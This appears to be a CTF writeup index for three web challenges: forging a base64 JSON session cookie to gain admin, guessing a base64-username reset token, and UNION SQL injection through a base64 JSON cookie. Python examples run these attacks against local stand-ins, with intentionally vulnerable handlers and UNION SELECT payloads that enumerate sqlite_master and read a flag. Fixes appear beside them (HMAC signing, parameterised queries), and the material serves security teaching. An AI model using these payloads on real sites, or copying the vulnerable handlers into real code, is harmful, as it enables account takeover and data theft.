Cookie Monster — Base64 JSON Cookie Role Elevation

The session cookie is the URL-encoded base64 of a JSON object holding the user's id, role and username. Decode it, set the role to 0 and the username to admin, re-encode it, and the admin page is reachable with the forged cookie.

January 1, 2024 · 2 min · giordii
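The forgery described above, as an added example rather than code from the writeup or the challenge: decode the URL-encoded base64 JSON cookie, rewrite the role and username, and re-encode it. The field names, the role numbering (0 = admin) and the sample cookie are assumptions. A vulnerable check that trusts the decoded fields sits beside an HMAC-signed variant that rejects the same edit.

```python
import base64
import hashlib
import hmac
import json
import urllib.parse
from typing import Optional

# Constructed sample cookie, set the way the server would: JSON -> base64 -> URL-encode.
# Field names and role numbering (0 = admin) are assumptions for this example.
ORIGINAL_COOKIE = urllib.parse.quote(
    base64.b64encode(json.dumps({"id": 42, "role": 1, "username": "guest"}).encode()).decode()
)


def decode_cookie(cookie: str) -> dict:
    """URL-decode, base64-decode, then parse the JSON payload."""
    return json.loads(base64.b64decode(urllib.parse.unquote(cookie)))


def encode_cookie(payload: dict) -> str:
    """Inverse of decode_cookie: JSON -> base64 -> URL-encode."""
    return urllib.parse.quote(base64.b64encode(json.dumps(payload).encode()).decode())


def forge_admin_cookie(cookie: str) -> str:
    """Elevate a decoded session to admin and re-encode it."""
    session = decode_cookie(cookie)
    session["role"] = 0
    session["username"] = "admin"
    return encode_cookie(session)


def is_admin_vulnerable(cookie: str) -> bool:
    """Vulnerable check: trusts whatever the client put in the cookie."""
    return decode_cookie(cookie)["role"] == 0


# Hardened variant: the server appends an HMAC tag over the encoded body and
# refuses cookies whose tag does not verify. SECRET is assumed to live only on the server.
SECRET = b"server-side-secret-key"


def sign_cookie(payload: dict) -> str:
    body = base64.b64encode(json.dumps(payload, sort_keys=True).encode()).decode()
    tag = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    return urllib.parse.quote(f"{body}.{tag}")  # '.' is outside the base64 alphabet


def verify_cookie(cookie: str) -> Optional[dict]:
    body, _, tag = urllib.parse.unquote(cookie).rpartition(".")
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(base64.b64decode(body))


def is_admin_hardened(cookie: str) -> bool:
    session = verify_cookie(cookie)
    return session is not None and session["role"] == 0


def forge_signed_cookie(cookie: str) -> str:
    """Same edit against the signed cookie: the body changes, the old tag no longer matches."""
    body, _, tag = urllib.parse.unquote(cookie).rpartition(".")
    session = json.loads(base64.b64decode(body))
    session["role"] = 0
    session["username"] = "admin"
    new_body = base64.b64encode(json.dumps(session, sort_keys=True).encode()).decode()
    return urllib.parse.quote(f"{new_body}.{tag}")


if __name__ == "__main__":
    forged = forge_admin_cookie(ORIGINAL_COOKIE)
    print("forged cookie:", forged)
    print("vulnerable check accepts forgery:", is_admin_vulnerable(forged))
    signed = sign_cookie({"id": 42, "role": 1, "username": "guest"})
    print("hardened check accepts forgery:", is_admin_hardened(forge_signed_cookie(signed)))
```

The fix is not to hide the encoding but to bind the cookie to a server-held key (or keep the session state server-side and hand out only an opaque id); base64 is an encoding, not a protection.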

Password Changer 3000 — Insecure Token via Base64-Encoded Username

The password-reset token is simply the base64 encoding of the username. Base64-encoding ‘admin’ and passing it as the token query parameter triggers the admin password-change flow and reveals the flag.

January 1, 2024 · 1 min · giordii

Sn4ck Sh3nan1gans — UNION SQL Injection via Base64 JSON Cookie

The server base64-decodes a JSON cookie, reads its ID field and interpolates it unsanitised into a SQL query. Put a UNION SELECT payload in that field, re-encode the JSON as base64, and send the forged cookie; three phases of injection extract the flag.

January 1, 2024 · 2 min · giordii
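The injection path described above, as an added example that is not the writeup's or the challenge's code: a handler that decodes the base64 JSON cookie and formats the id into a query, driven through three UNION phases (enumerate tables, read the target table's definition, read the flag) against a constructed in-memory SQLite database. The schema, table and column names, the flag value and the use of SQLite are assumptions; the enumeration queries use SQLite's sqlite_master and would differ on another engine. A parameterised handler that rejects non-integer ids is shown beside it.

```python
import base64
import json
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge database (names and flag are assumptions)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE snacks (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO snacks VALUES (1, 'pretzel'), (2, 'chips');
        CREATE TABLE flags (id INTEGER PRIMARY KEY, flag TEXT);
        INSERT INTO flags VALUES (1, 'flag{example}');
        """
    )
    return conn


def make_cookie(payload: dict) -> str:
    """Build the cookie the way the server expects: JSON, then base64."""
    return base64.b64encode(json.dumps(payload).encode()).decode()


def lookup_vulnerable(conn: sqlite3.Connection, cookie: str) -> list:
    """Vulnerable handler: the decoded id is pasted straight into the query text."""
    data = json.loads(base64.b64decode(cookie))
    query = f"SELECT name FROM snacks WHERE id = {data['id']}"
    return [row[0] for row in conn.execute(query)]


def lookup_fixed(conn: sqlite3.Connection, cookie: str) -> list:
    """Hardened handler: type-check the id and bind it as a parameter."""
    data = json.loads(base64.b64decode(cookie))
    if not isinstance(data.get("id"), int):
        return []  # anything but an integer id is refused outright
    return [row[0] for row in conn.execute("SELECT name FROM snacks WHERE id = ?", (data["id"],))]


# Three-phase UNION extraction. The original SELECT returns one column, so each
# injected SELECT returns exactly one column; id 0 matches nothing, so only the
# injected rows come back.
PHASES = {
    "tables": "0 UNION SELECT name FROM sqlite_master WHERE type='table'",
    "columns": "0 UNION SELECT sql FROM sqlite_master WHERE name='flags'",
    "flag": "0 UNION SELECT flag FROM flags",
}


def run_phases(conn: sqlite3.Connection) -> dict:
    """Send each payload inside a forged base64 JSON cookie and collect the rows."""
    return {
        phase: lookup_vulnerable(conn, make_cookie({"id": payload}))
        for phase, payload in PHASES.items()
    }


if __name__ == "__main__":
    db = build_db()
    for phase, rows in run_phases(db).items():
        print(f"{phase}: {rows}")
    print("fixed handler with payload:", lookup_fixed(db, make_cookie({"id": PHASES["flag"]})))
```

Encoding the cookie as base64 JSON changes nothing about the injection: the payload is whatever string lands in the id field after decoding. The fix is the parameterised query plus a type check, not a smarter decoder.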